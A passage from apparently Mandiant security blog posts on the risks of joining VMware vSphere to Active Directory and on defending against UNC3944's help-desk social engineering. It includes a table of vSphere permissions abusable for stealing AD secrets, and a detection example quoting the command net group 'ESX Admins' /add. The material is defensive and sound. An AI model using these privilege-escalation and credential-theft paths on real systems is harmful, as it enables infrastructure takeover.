Mandiant’s observation, based on extensive incident response engagements, is that many vSphere environments today still operate on this foundational architecture, carrying forward security assumptions that haven’t kept pace with the evolving threat landscape. As Mandiant’s assessments frequently identify, these architectures often prioritize functionality and stability over a security design grounded in today’s threats.

So what’s changed? Reliance solely on perimeter defenses is an outdated security strategy. The modern security boundary focuses on the user and device, typically protected by agent-based EDR solutions. But here lies the critical gap: The ESXi hypervisor, a purpose-built appliance, which, contrary to what many people believe, is not a standard Linux distribution. This specialized architecture inherently prevents the installation of external software, including security tools like EDR agents. vSphere documentation explicitly addresses this, stating:

“The ESXi hypervisor is a specialized, purpose-built solution, similar to a network router’s firmware. While this approach has several advantages, it also makes ESXi unable to run “off-the-shelf” software, including security tools, designed for general-purpose operating systems as the ESXi runtime environment is dissimilar to other operating systems.

The use of Endpoint Detection and Response (EDR) and other security practices inside third-party guest operating systems is supported and recommended.”

Source: Broadcom

Consequently, most organizations focus their security efforts and EDR deployment inside the guest operating systems. This leaves the underlying ESXi hypervisor—the foundation of the entire virtualization environment—as a significant blind spot for security teams.

The vSphere Threat Landscape

The security gap at the hypervisor layer, which we detailed in the previous section, has not gone unnoticed by threat actors. As security for Windows-based operating systems matured with advanced EDR solutions, threat actors have pivoted to a softer, higher-value target—the ESXi hypervisor itself.

This pivot is amplified by common operational realities. The critical role of ESXi hosts often leads to a hesitancy to apply patches promptly for fear of disruption. Many organizations face a rapidly closing window to mitigate risks; however, threat actors aren’t just relying on unpatched vulnerabilities. They frequently leverage compromised credentials, a lack of MFA, and simple misconfigurations to gain access.

The Rise of Hypervisor-Aware Ransomware

Ransomware targeting vSphere is fundamentally more devastating than its traditional Windows counterpart. Instead of encrypting files on servers or end user compute, these attacks aim to cripple the entire infrastructure by encrypting virtual disk files (VMDKs), disabling dozens of VMs at once.

This is not a theoretical threat. According to Google Threat Intelligence Group (GTIG), the focus on vSphere is rapidly increasing. Of the new ransomware families observed, the proportion specifically tailored for vSphere ESXi systems grew from ~2% in 2022 to over 10% in 2024. This demonstrates a clear and accelerating trend that threat actors are actively dedicating resources to build tooling that specifically targets the hypervisor. In incidents investigated by GTIG, threat actors most frequently deployed REDBIKE, RANSOMHUB, and LOCKBIT.BLACK variants.

GTIG analysts have also noted a recent trend for threat actors to gain persistence to vSphere environments via reverse shells deployed on Virtual center. This enables a foothold to be obtained within the vSphere control plane and thus complete control over all infrastructure. This would typically manifest in into a two-pronged approach: a tactical data exfiltration such as an AD database (NTDS.dit) and then the deployment of ransomware and mass encryption of all VMs.

Understanding the Active Directory Integration in vSphere

The decision to integrate vSphere with AD often overlooks the specifics of how this connection actually works. To properly assess the risk, we must look beneath the surface at the technical components that enable this functionality. This analysis will deconstruct those key pieces: the legacy agent responsible for authentication, its inherent inability to support modern security controls like multi-factor authentication (MFA), and the insecure default trust relationships it establishes. By examining these foundational mechanisms, we can expose the direct line from a credential compromise to an infrastructure takeover.

vSphere’s Likewise Agent

When discussing vSphere’s integration with AD, it’s essential to distinguish between two separate components: vCenter Server and the ESXi hosts. Their respective AD integration options are independent and possess different capabilities. This connection is entirely facilitated by the Likewise agent.

The Likewise agent was originally developed by Likewise Software to allow Linux and Unix-based systems to join AD environments, enabling centralized identity management using standard protocols like Kerberos, NTLM, and LDAP/(S). The open-source edition, Likewise Open, included tools such as domainjoin-cli and system daemons like lsassd, which are still found under the hood in ESXi and the vCenter Server Appliance (VCSA). vSphere embedded this agent starting with ESX 4.1 (released in 2010) to facilitate Integrated Windows Authentication (IWA). However, its function differs:

In ESXi, the Likewise agent actively handles AD user authentication when configured.
In vCenter, it is only used for the initial domain join when Integrated Windows Authentication (IWA) is selected as the identity source—all actual authentication is then handled by the vCenter Single Single On (SSO) subsystem.

The original Likewise Software was eventually absorbed by BeyondTrust, and the open-source edition of the agent is no longer actively maintained publicly. The Likewise OSS project is now archived and marked as inactive. It is understood the codebase is only maintained internally. Note: The agent’s build version remains identical at Likewise Version 6.2.0 across both ESXi 7 and 8.

The following table lists comparisons between native AD connection methods for both Virtual Center and ESXi.

Feature / Capability	ESXi Host	vCenter Server (VCSA)
AD Integration Method	Integrated Windows Authentication (IWA) only	IWA and LDAP/LDAPS Federated Identity (SAML, OIDC)
Likewise Agent Used	Yes – exclusively for IWA domain join and authentication	Yes – Used for IWA domain join only
Authentication Protocols Supported	Kerberos (via IWA only)	Kerberos (IWA), LDAP(S), SAML, OIDC
Modern Auth Support (OIDC, SAML, FIDO2)	Not supported	Not supported via AD Supported only when using federated IdPs
MFA Support	Not supported	Not supported via AD DS Supported via Identity Federation (ADFS, Azure AD, etc.)
Granular Role-Based Access Control (RBAC)	Limited (via host profile or CLI only)	Advanced RBAC with vCenter SSO

Why Not to Use Likewise-Based AD Integration (ESXi/vCenter)

The following list contains considerations when using AD-based connections managed by the vSphere Likewise agent:

Deprecated software: Likewise is legacy software, no longer maintained or supported upstream.
No support for modern authentication: Likewise only supports Integrated Windows Authentication (Kerberos) and offers no support for SAML, OIDC, or FIDO2.
No MFA: Likewise cannot enforce contextual policies such as MFA, geolocation restrictions, or time-based access.
Credential material stored locally: Kerberos keytabs and cached credentials are stored unencrypted on disk.

VMware recommends leveraging identity federation with modern identity providers, bypassing the limitations of the legacy Likewise-based stack. Broadcom announced on March 25 that IWA will be removed in the next major release.

The MFA Gap

While AD integration offers administrative convenience, it introduces significant security limitations, particularly regarding MFA. Traditional AD authentication methods, including Kerberos and NTLM, are inherently single-factor. These protocols do not natively support MFA, and the vCenter Likewise integration does not extend AD MFA enforcement to vCenter or ESXi.

Critically, ESXi does not support MFA in any form, nor does it support identity federation, SAML, or modern protocols such as OIDC or FIDO2. Even for vCenter, MFA can only be applied to users within the vSphere.local domain (using mechanisms like RSA SecurID or RADIUS), but not to AD-joined users authenticated through IWA or LDAP/S.

Ancillary solutions can offer proxy-based MFA that integrate with AD to enforce MFA to vSphere. AuthLite extends the native AD login process by requiring a second factor during Windows authentication, which can indirectly secure vCenter access when Integrated Windows Authentication is used. Silverfort operates at the domain controller level, enforcing MFA on authentication flows in real time without requiring agents on endpoints or changes to vCenter. Both solutions can help enforce MFA into vSphere environments that lack native support for it, but they can also introduce caveats such as added complexity and potential authorization loops if AD becomes dependent on the same infrastructure they protect and the need to treat their control planes or virtual appliances as Tier 0 systems within the vSphere environment.

As a result, in organizations that integrate vSphere with traditional Active Directory, all access to critical vSphere infrastructure (ESXi and Virtual Center) remains protected by password alone and no MFA.

While it is technically possible to enforce MFA in vSphere through Active Directory Federation Services (ADFS), this approach requires careful consideration. It is important to note that ADFS is still a feature included in Windows Server 2025 and is not on any official deprecation list with an end-of-life date. However, the lack of significant new feature development compared to the rapid innovation in Microsoft Entra ID speaks to its status as a legacy technology. This is underscored by the extensive migration resources Microsoft now provides to move applications away from AD FS and into Entra ID.

Therefore, while ADFS remains a supported feature, for the purposes of securing vSphere it is a complex workaround that doesn’t apply to direct ESXi access and runs contrary to Microsoft’s clear strategic direction toward modern, cloud-based identity solutions.

Another common approach involves Privileged Access Management (PAM). While a PAM-centric strategy offers benefits like centralized control and session auditing, several caveats warrant consideration. PAM systems add operational complexity, and the vCenter session itself is typically not directly federated with the primary enterprise identity provider (like Entra ID or Okta). Consequently, context-aware conditional access policies are generally applied only at the initial PAM logon, not within the vCenter session itself.

Ultimately, these workarounds do not address the core issue: vSphere’s reliance on the Likewise agent and traditional AD protocols prevents native MFA enforcement for AD users, leaving the environment vulnerable.

There is a reliance on a delegated logon based on AD password complexity, and any MFA would have to be at the network access layer or workstation login, not at the vCenter login prompt for those users.

The ‘ESX Admins’ Problem Is Not an ESXi Issue, It’s a Trust Issue

In July 2024, Microsoft published a blog post on CVE-2024-37085, an “ESXi vulnerability” that was considered a critical issue, and one that vSphere promptly addressed in a patch release. The CVE, present in vSphere ESXi for many years, involved several ESXi advanced settings utilizing insecure default configurations. Upon joining an ESXi host to an AD domain, the “ESX Admins” AD group is automatically granted an ESXi Admin role, potentially expanding the scope of administrative access beyond the intended users.

These settings are configured by the following ESXi controls:

Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd
- What it does: This setting controls whether users from a designated administrators group are automatically added to the host’s local administrative group.
Config.HostAgent.plugins.vimsvc.authValidateInterval
- What it does: This setting defines the time interval at which the host’s management services validate the authentication credentials (or tickets) of connected clients.
Config.HostAgent.plugins.hostsvc.esxAdminsGroup
- What it does: This parameter specifies the name (or identifier) of the group whose members are to be automatically considered for host administrative privileges (when auto-add is enabled by the first setting).

vSphere produced a manual workaround for prior versions of vSphere ESXi 8.0 Update 3 based on the following settings:

Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false

Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90

Config.HostAgent.plugins.hostsvc.esxAdminsGroup from “ESX Admins” to “”

The following is a configuration fix to default settings in vSphere ESXi 8.0 Update 3:

Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd from true to false

Config.HostAgent.plugins.vimsvc.authValidateInterval from 1440 to 90

Config.HostAgent.plugins.hostsvc.esxAdminsGroup no change “ESX Admins”

Integrating an ESXi host with Microsoft AD introduces a fundamental security issue that is often overlooked—the IdP’s administrators effectively gain administrative control over the ESXi host and any other system relying on that trust. While a common perception, sometimes reinforced by narratives focusing on the endpoint, suggests the ESXi host itself is the primary vulnerability, the more critical security concern is the implicit, far-reaching administrative power wielded by the administrators of the trusted IdP, particularly when using AD authentication with ESXi.

Administrators of Active Directory implicitly become administrators of any ESXi host that trusts it.

Consequently, neither workarounds nor configuration fixes, which only adjust default settings, resolve this core problem when an ESXi host is joined to AD. The issue transcends specific CVEs; it stems from the inherent security implications of the implicit trust model itself, particularly when it involves systems like ESXi and AD, which already possess their own security vulnerabilities and are frequent targets for threat actors.

In respect of ESXi, context should be applied to the following:

Automatic full administrative access: When ESXi hosts are joined to AD, a default (or custom configured) AD group (e.g., “ESX Admins”) is granted full root-level administrative privileges on the ESXi hosts. Any member of this AD group instantly gains unrestricted control of the ESXi host.
Group name: If AD is compromised, threat actors can manipulate any group name used for via the the Config.HostAgent.plugins.hostsvc.esxAdminsGroup advanced setting, This is not limited to the group name “ESX Admins.”
Lack of security identifier (SID) tracking: AD group names (not limited to “ESX Admins”) added to ESXi are not tracked by their SIDs. This means that a threat actor could rename or recreate a deleted AD group such as “ESX Admins” maintaining the same name in ESXi via Config.HostAgent.plugins.hostsvc.esxAdminsGroup and retain the elevated privileges. This is a limitation of the Likewise ESXi agent.
Active Directory group management. Any threat actor looking to access a domain-joined ESXi host would need to simply require sufficient permissions to add themselves to the AD group defined via Config.HostAgent.plugins.hostsvc.esxAdminsGroup.

Recent discussions around vulnerabilities like CVE-2024-37085 have brought this security issue to the forefront: the inherent dangers of joining vSphere ESXi hosts directly to an AD domain. While such integration offers perceived management convenience, it establishes a level of trust that can be easily exploited.

Why Your ESXi Hosts Should Never Be Active Directory Domain Joined

Based on previous discussions we can confidently establish that joining an ESXi host to AD carries substantial risk. This is further endorsed where there is an absence of comprehensive ESXi security controls such as Secure Boot, TPM, execInstalledOnly, vCenter integration, comprehensive logging and SIEM integration. Compromised AD credentials tied to an ESXi-joined group will allow remote threat actors to readily exploit the elevated privileges, executing actions such as virtual machine shutdown and ransomware deployment via SSH. These risks can be summarized as follows:

No MFA support: ESXi does not support MFA for AD users. Domain joining exposes critical hypervisor access to single-factor password-based authentication.
Legacy authentication protocols: ESXi relies on IWA and Kerberos / NTLM / Windows Session Authentication (SSPI)—outdated protocols vulnerable to various attacks, including pass-the-hash and credential relay.
Likewise agent is deprecated: The underlying Likewise agent is a discontinued open-source project. Continued reliance on it introduces maintenance and security risks.
No modern authentication integration: ESXi does not support federated identity, SAML, OIDC, FIDO2, or conditional access.
AD policy enforcement is absent: Group Policy Objects (GPOs), conditional access, and login time restrictions do not extend to ESXi via AD join, undermining centralized security controls.
Complexity without benefit: Domain joining adds administrative overhead without offering meaningful security gains — especially when using vCenter as the primary access point.
Limited role mapping granularity: Group-based role mappings on ESXi are basic and cannot match the RBAC precision available in vCenter, reducing access control fidelity.

To securely remove ESXi hosts from AD, a multistep process is required to shift access management explicitly to vCenter. This involves assessing current AD usage, designing granular vCenter roles, configuring vCenter’s RBAC, removing hosts from the domain via PowerCLI, and preventing future AD re-integration. All management then moves to vCenter, with direct ESXi access minimized. This comprehensive approach prioritizes security and efficiency by moving away from AD reliance for ESXi authentication and authorization towards a vCenter-centric, granular RBAC model. vSphere explicitly discourages joining ESXi hosts to AD:

“ESXi can be joined to an Active Directory domain as well, and that functionality continues to be supported. We recommend directing all configuration & usage through the Role-Based Access Controls (RBAC) present in vCenter Server, though.”

Source: VMware

vSphere Virtual Center — The Primary Target

vSphere vCenter Server represents a strategic objective for threat actors due to its authoritative role as the centralized management for virtualized infrastructure. A compromised vCenter instance effectively cedes comprehensive administrative control over the entire virtual estate, encompassing all connected ESXi hypervisors, virtual machines, datastores, and virtual network configurations.

Through its extensive Application Programming Interfaces (APIs), adversaries can programmatically manipulate all managed ESXi hosts and their resident virtual machines, enabling actions such as mass ransomware deployment, large-scale data exfiltration, the provisioning of rogue virtual assets, or the alteration of security postures to evade detection and induce widespread operational disruption.

Furthermore, the vCenter Server appliance itself can be subverted by implanting persistent backdoors, thereby establishing covert command-and-control (C2) channels that allow for entrenched persistence and continued malicious operations. Consequently, its critical function renders vCenter a high-value target. The following should be considered:

Coupled security dependency (compromise amplification risk): Directly linking vCenter to AD makes vSphere security dependent on AD’s integrity. As AD is a prime target, compromising privileged AD accounts mapped to vCenter grants immediate, potentially unrestricted administrative access to the virtual infrastructure, bypassing vSphere-specific security layers. Insufficient application of least privilege for AD accounts in vSphere magnifies this risk.
Single-factor authentication weakness (credential compromise risk): Relying solely on AD password validation makes vCenter highly vulnerable to common credential compromise methods (phishing, brute-force, spraying, stuffing, malware). Without mandatory MFA, a single stolen password for a privileged AD account allows complete authentication bypass, enabling unauthorized access, data breaches, ransomware, or major disruptions.
Lack of native MFA: The direct vsphere.local-to-AD integration offers no built-in enforcement of strong authentication like phishing resistant FIDO2 . While compatibility exists for external systems (Smart Cards, RSA SecurID), these require separate, dedicated infrastructure and are not inherent features, leaving a significant authentication assurance gap if unimplemented.
Facilitation of lateral movement and privilege escalation: Compromised AD credentials, even non-administrative ones with minimal vSphere rights, allow threat actors initial vCenter access. vCenter can then be exploited as a pivot point for further network infiltration, privilege escalation within the virtual environment, or attacks on guest systems via console/API access, all stemming from the initial single-factor credential compromise.

Integrating vSphere vCenter directly with AD for identity management, while common, inherently introduces significant security vulnerabilities stemming from coupled dependencies, reliance on single-factor authentication, a lack of native strong MFA, and facilitated attack pathways. These not only critically expose the virtual infrastructure but also provide avenues to exploit the VCSA appliance’s attack surface, such as its underlying Linux shell and the lack of comprehensive endpoint detection and response (EDR) capabilities.

Securing vSphere: The Tier 0 Challenge

The widespread practice of running Tier 0 services—most critically, AD domain controllers (often used for direct Identity integration)—directly on vSphere hypervisors introduces a significant and often overlooked security risk. By placing Active Directory Domain Controllers on vSphere, any successful attack against the hypervisor effectively hands threat actors the keys to the entire AD environment, enabling complete domain takeover. Mandiant observes that a general lack of awareness and proactive mitigation persists.

The danger is significant and present, for example, even for vSphere permissions that appear low-risk or are operationally common. For example, the privilege to snapshot an AD virtual machine can be weaponized for complete AD takeover. This specific vSphere capability, often assigned for backup routines, enables offline NTDS.dit (AD database) exfiltration. This vSphere-level action renders many in-guest Windows Server security controls ineffective, bypassing not only traditional measures like strong passwords and MFA, but also advanced protections such as LSASS credential guard and EDR, which primarily monitor activity within the operating system. This effectively paves a direct route to full domain compromise for a threat actor possessing this specific permission.

Mandiant observed these tactics, techniques, and procedures (TTPs) attributed to various ransomware groups across multiple incidents. The absence of VM encryption and logging makes this a relatively simple task to obtain the AD database while being undetected.

The following table contains a list of sample threats matched to related permissions:

Threat	Risk	Minimum vSphere Permission Required
Unencrypted vMotion	Memory-in-transit (e.g., LSASS, krbtgt hashes) can be captured during migration.	Role: Virtual Machine Power User or higher Permission: Host > Inventory > Migrate powered on virtual machine
Unencrypted VM Disks	AD database (NTDS.dit), registry hives, and password hashes can be stolen from VMDKs.	Role: Datastore Consumer, VM Admin or higher. Permission Datastore > Browse, Datastore > Low level file operations
Snapshot Creation	Snapshots preserve memory and disk state; can be used to extract in-memory credentials.	Role: Virtual Machine Power User or higher. Permission: Virtual Machine > State > Create Snapshot
Mounting VMDK to another VM	Enables offline extraction of AD secrets (e.g., NTDS.dit, registry, SYSVOL).	Role: VM Admin or custom with disk-level access. Permission Virtual Machine > Configuration > Add existing disk, Datastore > Browse
Exporting / Cloning VM	Enables offline AD analysis, allowing credential extraction or rollback attacks.	Role: Virtual Machine Administrator or higher. Permission: Virtual Machine > Provisioning > Clone, Export OVF Template
Console Access (VMRC / Web Console)	Full keyboard/video access enables manual attacks or credential harvesting.	Role: Virtual Machine User or higher. Permission: Virtual Machine > Interaction > Console interaction
vNIC on Improper VLAN	VM exposed to lateral movement or direct attack from compromised systems.	Role: Virtual Machine Admin or custom. Permission: Virtual Machine > Configuration > Modify device settings
Copy/Paste via vSphere Tools	Silent exfiltration of credentials/scripts via clipboard or drag/drop.	No specific vCenter privilege — host config or tools policy used
BIOS/Boot Order Abuse	ISO boot enables password resets, security bypass, or persistence.	Role: Virtual Machine Admin or custom. Permission: Virtual Machine > Configuration > Modify device settings

Delegation of trust from vSphere vCenter to AD grants implicit administrator privileges on the trusted systems to any AD domain administrator. This elevates the risk profile of AD compromise, impacting the entire infrastructure. To mitigate this, implement a two-pronged strategy: first, create a separate, dedicated vSphere environment specifically for the most critical Tier 0 assets, including AD. This isolated environment should be physically or logically separated from other systems and highly secured with robust network segmentation. Second, implement a zero-trust security model for the control plane of this environment, verifying every access request regardless of source. Within this isolated environment, deploy a dedicated “infrastructure-only” IdP (on-premises or cloud). Implementing the principle of least privilege is paramount.

A dedicated, isolated vSphere environment for Tier 0 assets (e.g., Active Directory) should have strictly limited administrative access (via a PAW), granting permissions only to those directly managing the infrastructure. This significantly reduces the impact of a breach by preventing lateral movement and minimizing damage. Unnecessary integrations should be avoided to maintain the environment’s security and adhere to the least-privilege model.

To effectively safeguard critical Tier 0 assets operating within the vSphere environment–specifically systems like Privileged Access Management (PAM), Security Information and Event Management (SIEM) virtual appliances, and any associated AD tools deployed as virtual appliances–a multilayered security approach is essential. These assets must be treated as independent, self-sufficient environments. This means not only isolating their network traffic and operational dependencies but also, critically, implementing a dedicated and entirely separate identity provider (IdP) for their authentication and authorization processes. For the highest level of assurance, these Tier 0 virtual machines should be hosted directly on dedicated physical servers. This practice of physical and logical segregation provides a far greater degree of separation than shared virtualized environments.

The core objective here is to break the authorization dependency chain, ensuring that credentials or permissions compromised elsewhere in the network cannot be leveraged to gain access to these Tier 0 systems. This design creates defense in depth security barriers, fundamentally reducing the likelihood and impact of a complete system compromise.

Conclusion

Mandiant has observed that threat actors are increasingly targeting vSphere, not just for ransomware deployment, but also as a key avenue for data exploitation and exfiltration. This shift is demonstrated by recent threat actor activity observed by GTIG, where adversaries have leveraged compromised vSphere environments to exfiltrate sensitive data such as AD databases before or alongside ransomware execution.

As this document has detailed, the widespread reliance on vSphere, coupled with often underestimated risks inherent in its integration with AD and the persistence of insecure default configurations, creates a dangerously vulnerable landscape. Threat actors are not only aware of these weaknesses but are actively exploiting them with sophisticated attacks increasingly targeting ESXi and vCenter to achieve maximum impact.

The usability and stability that make vSphere a foundational standard for on-premise and private clouds can be misleading; they do not equate to inherent security. The evolution of the threat landscape, particularly the direct targeting of the hypervisor layer which bypasses traditional endpoint defenses, necessitates a fundamental shift in how vSphere security is approached. Relying on outdated practices, backups, perimeter defenses alone, or assuming EDR on guest VMs provides sufficient protection for the underlying infrastructure creates significant security gaps and exposes an organization to severe risks.

Identity integration vulnerabilities will be exploited, therefore, organizations are strongly urged to immediately assess their vSphere environment’s AD integration status and decisively prioritize the implementation of the mitigation strategies outlined in this document. This proactive stance is crucial to effectively counter modern threats and includes:

Decoupling critical dependencies: Severing direct ESXi host integration with AD is paramount to shrinking the AD attack surface.
Modernizing authentication: Implementing robust, phishing-resistant MFA for vCenter, preferably via identity federation with modern IdPs, is no longer optional but essential.
Systematic hardening: Proactively addressing the insecure defaults for ESXi and vCenter, enabling features like execInstalledOnly, Secure Boot, TPM, Lockdown Mode, and configuring stringent firewall rules.
Enhanced visibility: Implementing comprehensive remote logging for both ESXi and vCenter, feeding into a SIEM with use cases specifically designed to detect hypervisor-level attacks.
Protecting Tier 0 assets: Strategically isolating critical workloads like Active Directory Domain Controllers in dedicated, highly secured vSphere environments with strict, minimized access controls and encrypted VMs and vMotion.

The upcoming end-of-life for vSphere 7 in October 2025 means that vast numbers of organizations will not be able to receive product support, security patches and updates for a product that underpins Infrastructure. This presents a critical juncture for organizations and a perfect storm for threat actors. The transition away from vSphere 7 should be viewed as a key opportunity to re-architect for security, not merely a routine upgrade to implement new features and obtain support. Failure to proactively address these interconnected risks by implementing these recommended mitigations will leave organizations exposed to targeted attacks that can swiftly cripple their entire virtualized infrastructure, leading to operational disruption and financial loss. The time to adopt a resilient, defense-in-depth security posture to protect these critical vSphere environments is unequivocally now.

Read More for the details.

2025 07 23

GCP – From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944

Tibor Kiss Cloud, Google Cloud gcp

Introduction

In mid 2025, Google Threat Intelligence Group (GITG) identified a sophisticated and aggressive cyber campaign targeting multiple industries, including retail, airline, and insurance. This was the work of UNC3944, a financially motivated threat group that has exhibited overlaps with public reporting of “0ktapus,” “Octo Tempest,” and “Scattered Spider.” Following public alerts from the Federal Bureau of Investigation (FBI), the group’s targeting became clear. GTIG observed that the group was suspected of turning its ransomware and extortion operations to the U.S. retail sector. The campaign soon broadened further, with airline and transportation organizations in North America having also become targets.

The group’s core tactics have remained consistent and do not rely on software exploits. Instead, they use a proven playbook centered on phone calls to an IT help desk. The actors are aggressive, creative, and particularly skilled at using social engineering to bypass even mature security programs. Their attacks are not opportunistic but are precise, campaign-driven operations aimed at an organization’s most critical systems and data.

Their strategy is rooted in a “living-off-the-land” (LoTL) approach. After using social engineering to compromise one or more user accounts, they manipulate trusted administrative systems and use their control of Active Directory as a launchpad to pivot to the vSphere vSphere environment thus providing an avenue to exfiltrate data and deploy ransomware directly from the hypervisor. This method is highly effective as it generates few traditional indicators of compromise (IoCs) and bypasses security tools like endpoint detection and response (EDR), which often have limited or no visibility into the ESXi hypervisor and vCenter Server Appliance (VCSA).

This blog post provides a deep dive into the anatomy of UNC3944’s vSphere-centric attacks and outlines a fortified, multi-pillar defense strategy required for mitigation. Learn more about the risks associated with integrating VMware vSphere with Microsoft Active Directory. Additionally, register for our upcoming webinar to learn these strategies directly from Mandiant experts.

vSphere Logging Fundamentals

Before discussing key detection signals and hardening strategies related to UNC3944’s vSphere-related operations, it’s important to understand vSphere logging and the distinction between vCenter Events and ESXi host logs. When forwarded to a central syslog server, vCenter Server events and ESXi host logs represent two distinct yet complementary sources of data. Their fundamental difference lies in their scope, origin, and the structured, event-driven nature of vCenter logs versus the verbose, file-based output of ESXi.

1. vCenter Server (VC Events)

vCenter events operate at the management plane, providing a structured audit trail of administrative actions and automated processes across the entire virtual environment. Each event is a discrete, well-defined object identified by a unique eventTypeId, such as VmPoweredOnEvent or UserLoginSessionEvent. This programmatic identification makes them ideal for ingestion into Security Information and Event Management (SIEM) platforms like Splunk or Google Chronicle for automated parsing, alerting, and security analysis.

Native storage & syslog forwarding: These events are generated by vCenter Server and stored within its internal VCSA database (PostgreSQL). When forwarded, vCenter streams a real-time copy of these structured events to the syslog server. The resulting log message typically contains the formal eventTypeId along with its human-readable description, allowing for precise analysis.
Primary use cases:

Security auditing & forensics: Tracking user actions, permission changes, and authentication
Change management: Providing a definitive record of all configuration changes to clusters, hosts, and virtual machines (VMs)
Automated alerting: Triggering alerts in a SIEM or monitoring tool based on specific eventTypeIds (e.g., HostCnxFailedEvent)

Examples of vCenter EventsAs documented in resources like the vCenter Event Mapping repository, each event has a specific programmatic identifier.

UserLoginSessionEvent

Description: “User {userName}@{ipAddress} logged in as {locale}”
Significance: A critical security event for tracking all user access to the vCenter management plane

VmCreatedEvent

Description: “Created virtual machine {vm.name} on {host.name} in {datacenter.name}”
Significance: Logs the creation of new inventory objects, essential for asset management and change control

VmPoweredOffEvent

Description: “Virtual machine {vm.name} on {host.name} in {datacenter.name} is powered off”
Significance: Tracks the operational state and availability of workloads. An unexpected power-off event is a key indicator for troubleshooting.

Note on VCSA Logging Limitations: The VCSA does not, out-of-the-box, support forwarding critical security logs for denied network connections or shell command activity. To enable this non-default capability, a custom configuration at the native Photon OS level is required. This is an agentless approach that leverages only built-in Linux tools (like iptables and logger) and does not install any third-party software. This configuration pipes firewall and shell events into the VCSA’s standard rsyslog service, allowing the built-in remote logging mechanism to forward them to a central SIEM.

2. ESXi Host Logs

ESXi logs operate at the hypervisor level, providing granular, host-specific operational data. They contain detailed diagnostic information about the kernel, hardware, storage, networking, and services running directly on the ESXi host.

Native storage: These logs are enabled by default and stored as a collection of plain text files on the ESXi host itself, primarily within the /var/log/ directory. This storage is often a local disk or a persistent scratch partition. If a persistent location is not configured, these logs are ephemeral and will be lost upon reboot, making syslog forwarding essential for forensics.

Primary use cases:
- Deep-dive troubleshooting of performance issues
- Diagnosing hardware failures or driver issues
- Analyzing storage and network connectivity problems
Examples of ESXi log entries sent to syslog:
- (from vmkernel.log): Detailed logs about storage device latency
- (from hostd.log): Logs from the host agent, including API calls, VM state changes initiated on the host, and host service activity
- (from auth.log): Records of successful or failed login attempts directly to the host via SSH or the DCUI

3. ESXi Host Audit Logs

ESXi audit records provide a high-fidelity, security-focused log of actions performed directly on an ESXi host. The following analysis of the provided example demonstrates why this log source is forensically superior to standard logs for security investigations. These logs are not enabled by default.

Native storage & persistence: These records are written to audit.*.log on the host’s local filesystem, governed by the Syslog.global.auditRecord.storageEnable = TRUE parameter. Persistent storage configuration is critical to ensure this audit trail survives a reboot.

Forensic analysis: standard vs. audit log: In the provided scenario, a threat actor logs into an ESXi host, attempts to run malware, and disables the execInstalledOnly security setting. Here is how each log type captures this event:
Standard syslog shell.log analysis: The standard log provides a simple, chronological history of commands typed into the shell.

- Limitations:
  - No login context: It does not show the threat actors source IP address or that the initial SSH login was successful.
  - No outcome: It shows the command ./malware was typed but provides no information on whether it succeeded or failed.
  - Incomplete narrative: It is merely a command history, lacking the essential context needed for a full security investigation.
ESXi audit log analysis: The ESXi audit log provides a rich, structured, and verifiable record of the entire session, from connection to termination, including the outcome of each command.

- Successful login: It explicitly records the successful authentication, including the source IP.
- Failed malware execution: This is the most critical distinction. The audit log shows that the malware execution failed with an exit status of 126.
- Successful security disablement: It then confirms that the command to disable a key security feature was successful.

This side-by-side comparison proves that while standard ESXi logs show a threat actor’s intent, the ESXi audit log reveals the actual outcome, providing actionable intelligence and a definitive forensic trail. A comprehensive logging strategy for a vSphere environment requires the collection and analysis of three distinct yet complementary data sources. When forwarded to a central syslog server, vCenter Server events, ESXi host audit records, and standard ESXi operational logs provide a multilayered view of the environment’s security, administrative changes, and operational health.

Characteristic	vCenter Server Events	ESXi Audit Logs	ESXi Standard Logs
Scope	Virtual Center, ESXI	ESXi	ESXi
Enabled by Default	Yes	No	Yes
Format	Structured Objects (eventTypeId)	Verbose, Structured Audit Entries	Unstructured/Semi-structured Text
Type	Administrative, Management, Audit	Security Audit, Kernel-level Actions	Management, System-Level State
Primary Storage	VCSA Internal Database	Local Filesystem (audit.log)	Local Filesystem (/var/log/)
Primary Use Case	Central Auditing, Full Cluster Management, Forensics	Direct Host Forensics, Compliance	Deep Troubleshooting, Diagnostics

Table 1: Comparison of ESXi Logs and vCenter Events

Anatomy of an Attack: The Playbook

UNC3944’s attack unfolds across five distinct phases, moving methodically from a low-level foothold to complete hypervisor control.

Phase 1: Initial Compromise, Recon, and Escalation

This initial phase hinges on exploiting the human element.

The tactic: The threat actor initiates contact by calling the IT help desk, impersonating a regular employee. Using readily available personal information from previous data breaches and employing persuasive or intimidating social engineering techniques, they build rapport and convince an agent to reset the employee’s Active Directory password. Once they have this initial foothold, they begin a two-pronged internal reconnaissance mission:
- Path A (information stores): They use their new access to scan internal SharePoint sites, network drives, and wikis. They hunt for IT documentation, support guides, org charts, and project plans that reveal high-value targets. This includes not only the names of individual Domain or vSphere administrators, but also the discovery of powerful, clearly named Active Directory security groups like “vSphere Admins” or “ESX Admins” that grant administrative rights over the virtual environment.
- Path B (secrets stores): Simultaneously, they scan for access to password managers like HashiCorp Vault or other Privileged Access Management (PAM) solutions. If they find one with weak access controls, they will attempt to enumerate it for credentials.

Armed with the name of a specific, high-value administrator, they make additional calls to the help desk. This time, they impersonate the privileged user and request a password reset, allowing them to seize control of a privileged account.

Why it’s effective: This two-step process bypasses the need for technical hacking like Kerberoasting for the initial escalation. The core vulnerability is a help desk process that lacks robust, non-transferable identity verification for password resets. The threat actor is more confident and informed on the second call, making their impersonation much more likely to succeed.
Key detection signals:
- [LOGS] Monitor for command-line and process execution: Implement robust command-line logging (e.g., via Audit Process Creation, Sysmon Event ID 1 or EDR). Create alerts for suspicious remote process execution, such as wsmprovhost.exe (WinRM) launching native tools like net.exe to query or modify sensitive groups (e.g., net group "ESX Admins" /add).
- [LOGS] Monitor for group membership changes: Create high-priority alerts for AD Event ID 4728 (A member was added to a security-enabled global group) or 4732 (local group) for any changes to groups named “vSphere Admins,” “ESX Admins,” or similar.
- [LOGS] Correlate AD password resets with help desk activity: Correlate AD Event ID 4724 (Password Reset) and the subsequent addition of a new multi-factor authentication (MFA) device with help desk ticket logs and call records.
